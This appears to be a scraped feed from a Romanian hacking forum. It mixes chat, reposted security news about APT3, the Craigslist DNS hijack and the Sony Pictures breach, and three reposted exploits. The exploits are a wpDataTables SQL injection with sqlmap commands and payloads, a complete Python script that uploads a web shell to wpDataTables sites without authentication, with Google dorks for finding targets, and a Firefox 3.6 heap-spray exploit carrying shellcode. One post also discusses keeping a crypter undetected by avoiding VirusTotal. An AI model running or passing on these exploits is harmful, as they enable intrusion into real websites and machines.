Aerosol

@Eddie91 e de acord iti dau eu parola in pm (dar sa spuna el daca vrea) On:// Buna treaba bre, multam Ca sa va dau un pont parola e cryptata

Trebuie printat

@sandabot

@gogusan nu au fost chiar inspirati oamenii in alegerea "decoratiunilor" )

Eu vin

Poate ne vedem, multam.

Congratulations! You've won a ticket to DefCamp 2014! He he ne vedem la DefCamp @xamolxes multumiri fiindca ai postat

Posibil sa fie o greseala... Avira e cel mai prost antivirus EVER (Avira & AVG )

He,he, functioneaza sa traiesti bre

Continutul lasa de dorit, tema/designul este ok, bafta cu site-ul mai mult nu am ce sa zic momentan.

@SticKyWoX nu stiu ce sa zic eu nu am patit asta pana acum... posibil sa fi avut tu ghinion.

On:// Salut :) :) :) :) :) :) poti sa folosesti mai putine ":)" deastea ca nu suntem pe mess sa stii... Cat despre "saiturile" aka site-urile guvernamentale ma indoiesc ca poti sa le faci ceva...

@SticKyWoX de ce zici ca produsele nu sunt de cea mai buna calitate frate? eu unul sunt multumit... ai patit ceva?

APT3, a group believed to be behind “Operation Clandestine Fox” is now using exploits targeting recently disclosed vulnerabilities in Windows, researchers at FireEye found. One of the bugs, CVE-2014-6332, was fixed this Patch Tuesday and noted for being remotely exploitable for 18 years prior to the update. The Windows OLE Automation Array Remote Code Execution vulnerability presented a serious security issue to users, researchers warned, as it impacts every version of Microsoft Windows since Windows 95. At the time, IBM X-Force Research manager Robert Freeman said that remote exploitation became possible with the release of Internet Explorer 3.0 in 1996, since Visual Basic Script (VBScript) was introduced. In an interview with SCMagazine.com, Freeman explained that exploitation of the bug would be a “tricky” feat, but also “very formulaic” to recreate once saboteurs came up with attack scenarios. Now, attacks exploiting the bug have appeared to come to fruition, as security firm FireEye detailed in a Friday blog post. According to the company, the Windows OLE bug, and a separate Windows privilege escalation vulnerability, CVE-2014-4113, have been targeted by the threat group called APT3. Both bugs received a patch from Microsoft (4113 in October's Patch Tuesday and 6332 in this month's update), a sign that APT3 has apparently moved from leveraging zero-day exploits, to targeting victims with “known exploits or social engineering,” FireEye said. In the Clandestine Fox campaign APT3 carried, the group was initially observed exploiting an Internet Explorer zero-day to deliver malware to users. Then the group switched up its tactics, wooing new victims via social engineering – in one instance, targeting an energy company by posing as a job applicant seeking employment. The supposed applicant contacted an employee on a popular social networking site, and weeks later emailed a resume to the employee's personal email account, which contained a weaponized file designed to drop a backdoor called “Cookie Cutter.” In the most recent wave of phishing lures beginning last Wednesday, dubbed “Operation Double Tap,” attackers sent malicious emails claiming to offer a free month's membership to a Playboy website, FireEye warned. On Oct. 28, APT3 was again observed sending spearphishing emails, which ultimately installed backdoor Cookie Cutter on vulnerable users' machines. FireEye published indicators of compromise (IOCs) in its post. In a Monday interview with SCMagazine.com, John Kuhn, senior threat researcher at IBM X-Force, said that his company had detected separate attacks targeting the Windows OLE bug. On Monday, Trey Ford, global security strategist at Rapid7, told SCMagazine.com in email correspondence that the exploitation of Windows OLE in the wild demonstrates why there needs to be “several paths forward in a vulnerability disclosure line of conversation.” Source

Around 5:00pm PST on November 23, the Domain Name Service records for at least some of the sites hosted by the online classified ad and discussion service Craigslist were hijacked. At least some Craigslist visitors found their Web requests redirected toward an underground Web forum previously associated with selling stolen celebrity photos and other malicious activities. In a blog post, Craigslist CEO Jim Buckmaster said that the DNS records for Craigslist sites were altered to direct incoming traffic to what he characterized as “various non-craigslist sites.” The account was restored, and while the DNS records have been corrected at the registrar, some DNS servers were still redirecting traffic to other servers as late as this afternoon. Craigslist's domain registrar is Network Solutions, which is owned by Web.com. [update, 5:32 PM EST November 24: John Herbkersman, a spokesperson for Web.com, told Ars,“The issue has been resolved. At this time we are continuing to investigate the incident.”] One site that appeared to receive most of the traffic destined for Craigslist was “Digital Gangster,” an invitation-only Web board owned by rapper and hacker Bryce Case, Jr.—also known as YTCracker. Case gained notoriety in 1999 for hacking into the network of NASA's Goddard Space Flight Center. DigitalGangster.com advertises itself as being “dedicated to nothing in particular other than being important. It is responsible for millions of dollars in commerce and millions of terrible pranks on the Internet. Be warned: kids have been born as a result of posting here (seriously).” Among other things, members of the site were accused of involvement in the posting of images stolen from Miley Cyrus’ e-mail in 2008. The forum site now appears to be down as a result of the additional traffic sent its way, which may have been intended as a denial of service attack against the forum. [update: As of 4:27 PM ET, the site is back up, with errant traffic redirected to another site.] The site has been the target of previous denial of service and defacement attacks. Via Twitter, YTCracker told Ars that "this was a joe job anyway so i just redirected it to my video. I think Obama is behind it." Source

Sony Pictures Entertainment has been targeted by computer hackers in an attack which reports say forced it shut down its systems on Monday. A skull appeared on computer screens along with a message threatening to release data "secrets" if undisclosed demands were not met, reports said. The message showed "#GOP" indicating a group called Guardians of Peace was behind the attack. Sony has issued a statement saying the firm is investigating the "IT matter". The tech firm has reportedly shut down its computer network as a precaution and advised employees that resolving the situation could take anywhere from one day to three weeks. Meanwhile, an anonymous user on the Reddit news website posted an image allegedly from a Sony computer screen, which said "Warning: We've already warned you, and this is just the beginning… We have obtained all your internal data including secrets and top secrets". Sony under attack News of the online attack comes just months after Sony's Playstation network was forced offline by a cyber attack in August. Wee Teck Loo, head of consumer electronics research at Euromonitor said any negative news for Sony just "piles" pressure on the company that has been struggling financially in both its TV and mobile business. Charles Lim, senior industry analyst at ICT, Frost & Sullivan Asia Pacific, however, said the attack has put into question what "multi-layers of prevention" Sony has to detect and handle such risks. High profile companies like Sony can be targeted and hacked every day, according consulting firm AT Kearney. In its latest research, the firm said that experts estimate that at least 25% of all companies have already suffered financial loss through some form of cyber attack. line Analysis: Richard Taylor, BBC North America Technology Correspondent Sony is understandably keen to downplay this latest hacking threat. "We are investigating the matter" is the kind of benign language more commonly used for routine technological issues, not chilling messages threatening to unleash reams of data to the world. The demands are opaque so it is unclear how damage could be wrought should Sony fail to resolve the situation before the deadline. Sony Pictures has at least reclaimed its compromised Twitter accounts. Nevertheless, this internal corporate attack does not yet appear to be of the magnitude of previous public breaches that Sony has suffered. But the fact that hackers have again apparently infiltrated Sony's systems will do nothing to restore public faith that the Japanese technology giant has its security affairs in order. And it is somewhat ironic that Sony has only just dismissed the allegation made by hackers that they had succeeded in breaching the Playstation network earlier this year. This latest attack cannot be so easily dismissed. Source

?###################### # Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : http://wpdatatables.com (Premium) # Date : 2014-11-22 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Description Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability "table_id" variable is not sanitized. File: wpdatatables.php ------------------------ // AJAX-handlers add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' ); add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' ); /** * Handler which returns the AJAX response */ function wdt_get_ajax_data(){ $id = $_GET['table_id']; <------------------- Not Sanitized! $table_data = wdt_get_table_by_id( $id ); $column_data = wdt_get_columns_by_table_id( $id ); $column_headers = array(); $column_types = array(); $column_filtertypes = array(); $column_inputtypes = array(); foreach($column_data as $column){ $column_order[(int)$column->pos] = $column->orig_header; if($column->display_header){ $column_headers[$column->orig_header] = $column->display_header; } if($column->column_type != 'autodetect'){ $column_types[$column->orig_header] = $column->column_type; }else{ $column_types[$column->orig_header] = 'string'; } $column_filtertypes[$column->orig_header] = $column->filter_type; $column_inputtypes[$column->orig_header] = $column->input_type; } ------------------------ (The vulnerable variable is located in others php files) ###################### # PoC http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli] # Sqlmap sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql --- Parameter: table_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=get_wdtable&table_id=1 AND 9029=9029 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: action=get_wdtable&table_id=1 AND SLEEP(5) --- ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source

#!/usr/bin/python # # Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability # # Vulnerability discovered by Claudio Viviani # # Date : 2014-11-22 # # Exploit written by Claudio Viviani # # Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc # # -------------------------------------------------------------------- # # Issue n.1 (wpdatatables.php) # # This function is always available without wpdatatables edit permission: # # function wdt_upload_file(){ # require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php'); # $uploadHandler = new UploadHandler(); # exit(); # } # ... # ... # ... # add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file' ); # add_action( 'wp_ajax_nopriv_wdt_upload_file', 'wdt_upload_file' ); # # # Issue n.2 (lib/upload/UploadHandler.php) # # This php script allows you to upload any type of file # # --------------------------------------------------------------------- # # Dork google: inurl:/plugins/wpdatatables # inurl:codecanyon-3958969 # index of "wpdatatables" # index of "codecanyon-3958969" # # Tested on BackBox 3.x # # # http connection import urllib, urllib2, sys, re # Args management import optparse # file management import os, os.path # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file # Create multipart header def create_body_sh3ll_upl04d(payloadname): getfields = dict() payloadcontent = open(payloadname).read() LIMIT = '----------lImIt_of_THE_fIle_eW_$' CRLF = '\r\n' L = [] for (key, value) in getfields.items(): L.append('--' + LIMIT) L.append('Content-Disposition: form-data; name="%s"' % key) L.append('') L.append(value) L.append('--' + LIMIT) L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname)) L.append('Content-Type: application/force-download') L.append('') L.append(payloadcontent) L.append('--' + LIMIT + '--') L.append('') body = CRLF.join(L) return body banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ ______ __ _______ __ __ | Y .-----| _ \ .---.-| |_.---.-| .---.-| |--| .-----.-----. |. | | _ |. | \| _ | _| _ |.| | | _ | _ | | -__|__ --| |. / \ | __|. | |___._|____|___._`-|. |-|___._|_____|__|_____|_____| |: |__| |: 1 / |: | |::.|:. | |::.. . / |::.| `--- ---' `------' `---' Sh311 Upl04d Vuln3r4b1l1ty <= 1.5.3 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('-f', '--file', action="store", help="Insert file name, ex: shell.php", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target or not options.file: print(banner) commandList.print_help() sys.exit(1) payloadname = checkfile(options.file) host = checkurl(options.target) timeout = options.timeout print(banner) url_wpdatatab_upload = host+'/wp-admin/admin-ajax.php?action=wdt_upload_file' content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$' bodyupload = create_body_sh3ll_upl04d(payloadname) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'content-type': content_type, 'content-length': str(len(bodyupload)) } try: req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers) response = urllib2.urlopen(req) read = response.read() if "error" in read or read == "0": print("[X] Upload Failed :(") else: backdoor_location = re.compile('\"url\":\"(.*?)\",\"').search(read).group(1) print("[!] Shell Uploaded") print("[!] Location: "+backdoor_location.replace("\\","")) except urllib2.HTTPError as e: print("[X] Http Error: "+str(e)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e)) Source

<!-- Exploit Author: Juan Sacco Name: Mozilla Firefox 3.6 mChannel ( Universal ) Description: Mozilla Firefox 3.6 is prone to an use-after-free vulnerability in OBJECT mChannel that allows an attacker to execute arbitrary code. Tested on Windows XP SP3 CVE: 2011-0065 --> <html> <head> </head> <body> <pre> # Title: Firefox 3.6 ( Universal ) </pre> <object id="exploit" ></object> <script> function exploit() { var foo=document.getElementById("exploit"); e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0); var vftable = unescape("\x00% u0c10"); var shellcode = unescape("%u0004%u0c10%uBCBB%u68F1%u0105%u0106%uBE51%u6623%u0030%u0c10%u7C2A%u68F0%u5B33%u661C%u0030%u0c10%uF1DD%u68F2%u0030%u0c10%u9000%u0000%u0040%u0000%u0c0c%u0c0c%u0038%u0c10%u9090%u9090%u9090%u9090%uC781%u986D%u0007%u078B%uF505%u03F6%u9000%u9090%u056A%uC181%u008E%u0000%u9051%uF08B%uD0FF%ucccc%uEE81%u95Fa%u0004%uFF6A%uD6FF%uCCCC%u6163%u636c%u652e%u6578%u0000%ucccc"); var vtable = unescape("%u0c0c%u0c0c"); while(vtable.length < 0x10000) {vtable += vtable;} var heapblock = shellcode+vtable.substring(0,0x10000/2-shellcode.length*2); while (heapblock.length<0x80000) {heapblock += shellcode+heapblock;} var finalspray = heapblock.substring(0,0x80000 - shellcode.length - 0x24/2 - 0x4/2 - 0x2/2); var heapspray = new Array() for (var i=0;i<0x100;i++){ heapspray[i] = finalspray+shellcode; } foo.data="";} </script> <input type=button value="Exploit" onclick="exploit()" /> </body> </html> Source

Arata ca se incarca(se misca liniutele de la baterie) sau iti apare doar aia si se inchide ? s-ar putea sa fie problema cu incarcatorul...

Frate esti din 2011 si nu ai invatat niciodata ca nu trebuie sa scanezi cu VT? Din cauza ta se duce pe ... fud-ul...

@Terry.Crews incearca sa faci un scaun din minecraft in realitate Cat despre joc, nu e chiar de cacat e destul de ok dar mna...

@Htich nu nu am platit, suna la ei sau dale un mail...

Sa-mi bag picioru' vecinul a comandat o plasma cu doar 2 lei l-au sunat acum 1 ora sa-i zica ca maine o primeste, revin cu detalii

Din cate am vazut ai venit aici doar pentru a "distruge saituri" asa ca ... On:// Salut